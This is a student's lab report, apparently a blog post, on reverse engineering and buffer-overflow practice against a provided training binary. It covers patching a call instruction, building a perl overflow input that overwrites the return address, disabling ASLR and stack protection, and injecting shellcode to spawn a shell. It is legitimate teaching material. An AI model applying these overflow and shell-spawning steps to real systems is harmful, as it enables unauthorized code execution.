Ep1 reverse engineering and Bof basic practice-20202127

1 Reverse and Bof basic practice instructions

1.1 Practical goals

Practice object : a linux executable file named pwn1 (renamed pwn2127).
The normal execution flow of the program : main calls the foo function, and the foo function simply echoes any string entered by the user.
The program also includes another piece of code, getShell, that returns a usable Shell.
Under normal circumstances getShell will not be run. The practical goal is to find a way to run getShell.

Practice content :

  • Manually modify the executable file, change the program execution flow, and jump directly to the getShell function.
  • Use the Bof vulnerability of the foo function to construct an attack input string, overwrite the return address, and trigger the getShell function.
  • Inject a self-made shellcode and run this shellcode.

1.2 Basic knowledge

Assembly knowledge

  • call : Call the subroutine. First push the return address (EIP) to the top of the stack, and then jump the program to the starting address of the current calling method.
    call=push eip + jump
  • leave : Close the stack frame. The stack pointer points to the frame pointer, and then POPs the backed-up original frame pointer to %EBP.
    leave=mov %ebp %esp + pop %ebp
  • ret : The return instruction of the subroutine. The return address at the top of the stack is popped to EIP, and the program continues to execute according to the instruction address indicated by EIP at this time.
    ret=pop eip
  • NOP : The NOP instruction is the "empty instruction". When the NOP instruction is executed, the CPU does nothing, just executes it as an instruction and continues to execute the instruction after the NOP. (Machine code: 90)
  • EIP : Register, which stores the memory address of the next instruction to be executed by the CPU. For example: the main function calls a sub-function, and EIP indicates which instruction to execute when returning to the main function after the sub-function is executed.
  • ESP : Register, which stores the top pointer of the stack, and always points to the top of the stack.
  • EBP : Register, which stores the bottom pointer of the stack. Before calling the subfunction, ESP passes the value to EBP as the bottom of the stack; when the subfunction is called, EBP passes the value to ESP, and ESP points to the top of the stack again.

Linux knowledge

  • objdump -d : Disassemble the section of machine code for specific instructions from objfile.
  • "|" : pipeline, the output of the former is used as the input of the latter.
  • ">" : Input and output redirection character, input the output content of the former to the latter.
  • more : Display the contents of the file in pages.
  • perl : followed by a string enclosed in single quotes, indicating the command to be executed on the command line. Perl is an interpreted language that does not require precompilation and can be used directly on the command line. "perl -e" is followed by a string enclosed in single quotes, indicating the command to be executed on the command line; use output redirection ">" to store the string generated by perl in a file.
  • xxd : Do a hexadecimal output for a given standard input or file, it can also convert the hexadecimal output to the original binary format.
  • ps -ef : Display all processes, and display the UID, PPIP, C and STIME fields of each process.
  • Little-endian mode : the high byte of data is stored in the high address of memory, and the low byte of data is stored in the low address of memory.
  • Big-endian mode : the high byte of data is stored in the low address of memory, and the low byte of data is stored in the high address of memory, which is consistent with the reading habits.
  • Stack : LIFO, the top of the stack is low and the bottom of the stack is high, the direction of growth is from high address to low address, and the direction of instruction execution is from low address to high address.
  • shellcode : A piece of machine instruction (code). Usually the purpose of this machine instruction is to obtain an interactive shell (like a linux shell or similar to cmd.exe under windows), so this machine instruction is called shellcode. In practical applications, any machine instruction segment used for injection is commonly called shellcode, such as adding a user and running an instruction.
  • ASLR : Address Space Layout Randomization, address space layout randomization. This is a security protection technique against buffer overflows. With ASLR, the starting address of the file will change randomly every time it is loaded into memory.

2 Directly modify the program machine instructions to change the program execution flow

Download the target file pwn1, change the file name to a name related to your student number (I changed it to pwn2127 in the experiment), and then objdump -d pwn1 | moredisassemble

more is an executable file that can be displayed in pages. The function of the pipeline "|" is to put the previous execution results into the "more" behind


Keep pressing Enter to display more information line by line until the found content
insert image description here

In the main function, the assembly instruction "call 8048491" will call the foo function at address 8048491. The corresponding machine instruction is "e8
d7ffffff", e8 means "jump", and the CPU will execute the instruction at the address "EIP + d7ffffff".
It can be seen from the core code that the address of the foo function is 0x8048491, so EIP=0x8048491-0xffffffd7=80484ba when jumping.

cp pwn1 pwn2Copy a file pwn2
insert image description here

Modify the executable file to change the target address of the call instruction from d7ffffff to c3ffffff:

  1. vi to enter pwn2, press the Esc key on the garbled interface, and then enter: %!xxd
  2. Find e8d7, modify d7 to c3 (press i first to enter the edit mode and then change, press Esc to exit)
  3. Type: %!xxd -r
  4. Enter: wq to exit
vi pwn2127			          #进入目标文件
:%!xxd				              #转换为16进制
/d7				                  #查找要修改的内容,
rcr3				              #用r将“d7”修改为c3
:%!xxd -r 			              #转换16进制为原格式
:wq				                  #保存退出

insert image description hereobjdump -d pwn2127 | moreDisassemble to check whether the modification is correct and
insert image description hererun pwn2127 again, and the program execution flow changes.
The original program input string will be echoed, and now a shell will appear, and any command can be input.
insert image description here

3 By constructing input parameters, causing BOF attacks and changing program execution flow

3.1 Disassembly to understand the basic functions of the program

It can be seen that the function reserves 0x38 (56 bytes) for local variables and 0x1c (28 bytes) for the string obtained by "gets".

If the string obtained in gets is longer than 32 bytes (28 - 0x1c + 4 - EBP), it will be overwritten to the EIP position.

As long as the string we constructed can overflow to the location of EIP and overwrite the return address "80484ba" in it with the address "804847d" of the getShell function, the program will return to the getShell function to execute after executing the foo function.

3.2 Confirm which characters of the input string will overwrite the return address

3.2.1 Install gdb

sudo chmod a+w /etc/apt/sources.list
sudo chmod a-w /etc/apt/sources.list
sudo su
apt-get update
apt-get install gdb

3.2.2 Analysis of characters covering the return address

Use gdb to debug, enter "r" to run the code.

gdb pwn2127	#进入gdb,调试程序pwn2127

Enter the string "12345abcdefghijklmnopqrstuvwxyz67890" with a length of 36 bytes. After the echo is displayed, a segment error occurs.

(gdb) r
Starting program: /root/pwn2127 
12345abcdefghijklmnopqrstuvwxyz67890
12345abcdefghijklmnopqrstuvwxyz67890

Program received signal SIGSEGV, Segmentation fault.
0x30393837 in ?? ()

View the values ​​of all current registers, among which the value of EIP is "0x30393837", which corresponds to the character "0987", which is exactly the content of the 33rd~36th bytes we input.

(gdb) info r		#显示寄存器的值	
eax            0x25                37
ecx            0xf7fad890          -134555504
edx            0x25                37
ebx            0x0                 0
esp            0xffffd360          0xffffd360
ebp            0x367a7978          0x367a7978
esi            0xf7fac000          -134561792
edi            0xf7fac000          -134561792
eip            0x30393837          0x30393837
eflags         0x10246             [ PF ZF IF RF ]
cs             0x23                35
ss             0x2b                43
ds             0x2b                43
es             0x2b                43
fs             0x0                 0
gs             0x63                99

Therefore, it can be judged that the content of the 33rd to 36th bytes input will overwrite the return address on the stack, and then the CPU will try to run the code at this location.

Then, as long as these four bytes are replaced with the memory address "804847d" of getShell, pwn2127 will run getShell.
insert image description here

3.3 Confirm what value to use to cover the return address

When the input is "7890", the value of EIP is "0x30393837", indicating that the byte order is little end first.

To get "0804847d", the input sequence should be "7d 84 04 08", which is "32 characters +\x7d\x84\x04\x08".
insert image description here

3.4 Constructing the input string

But "\x7d\x84\x04\x08" cannot be entered through the keyboard, and it must be completed by a program (Perl).

perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"'>  input20192415	#把这一串字符存在文件input20192415中(0a即回车,若没有则程序运行时需要手工按) 
xxd input20192415	    #验证构造的字符串是否符合预期

insert image description hereinsert image description here

4. Inject Shellcode and execute it

4.1 Prepare a Shellcode

Shellcode is a piece of machine instruction (code)

Usually the purpose of this machine instruction is to obtain an interactive shell (like a linux shell or similar to cmd.exe under windows), so this machine instruction is called shellcode.

In practical applications, any machine instruction segment used for injection is commonly called shellcode, such as adding a user and running an instruction.

4.2 Preparations

Enter sudo apt-get install execstack, install execstackthe command, and follow the tutorial:

  1. First execstack - sset the stack to be executable through the instruction
  2. Then use execstack -qthe command to query whether the stack of the file is executable
  3. Check found randomize_va_spaceto be 2, that is, the address randomization protection is turned on
    insert image description here
  4. Turn off address randomization
  5. Check found randomize_va_spaceto be 0, that is, the address randomization protection is turned off
    insert image description here

4.3 Construct the payload to be injected

There are two basic methods of constructing attack buf under Linux:

  • retaddr+nop+shellcode
  • nop+shellcode+retaddr

Because the position of retaddr in the buffer is fixed, the shellcode is either in front of it or behind it.

Simply put, if the buffer is small, put the shellcode at the back, and if the buffer is large, put the shellcode at the front

Our buf is enough for this shellcode, so the shellcode is put behind

The structure is: retaddr+nop+shellcode

One is for padding, and the other is for "landing area/taxi area".
As long as the return address we guess falls on any nop, it will naturally slip to our shellcode.

Open two terminals and enter root mode

Terminal 1 injects the attack buf, just press Enter once, and there should be no garbled characters in the guide. Open Terminal 2
insert image description here
and use gdb to debug the process of pwn2127.
insert image description hereGarbled characters appear on terminal 1
insert image description hereinsert image description hereand terminal 2 continues to execute. When you see 01020304, it is the location of the return address. The shellcode is right behind, so the address is 0xffffd320

Put 0xffffd320 into the shellcode, and after running, it is found that the shell is successfully obtained, and the attack is successful
insert image description here

5 Problems and Solutions

  • Problem 1: The memory address keeps changing, and the original shellcode injection failed after the reboot was successful.

  • Solution to problem 1: Since the first day of the experiment was not completed, the address can be randomized automatically after the virtual machine is shut down and restarted. Address randomization must be turned off again after each boot.

  • Question 2: When using xxd for the first time, an error that the command cannot be found appears.

  • Solution to problem 2: In fact, it can be used as long as the xxd toolkit is installed, but it is not mentioned in the experiment guide, and many similar problems will be encountered in the follow-up, and most of them can be solved by searching online.

6 Experiment experience

Through this implementation, I realized the buffer overflow vulnerability attack, and understood the change process of the stack and registers when calling the function. The content of the three parts of the experiment was in-depth and closely related step by step, which made me gradually familiar with assembly language and machine instructions, and enhanced the ability to analyze the execution process of assembly instructions.
But this experiment also reflects that my knowledge of Linux commands and assembly knowledge is not deep and proficient enough, and I need to continue to learn and consolidate. At the same time, this experiment successfully realized the buffer overflow vulnerability attack under many conditions such as "turning off the stack execution protection and turning off the address randomization". If such conditions are aside, there is still a lot to learn.

Guess you like

Origin blog.csdn.net/qq_57435798/article/details/129541170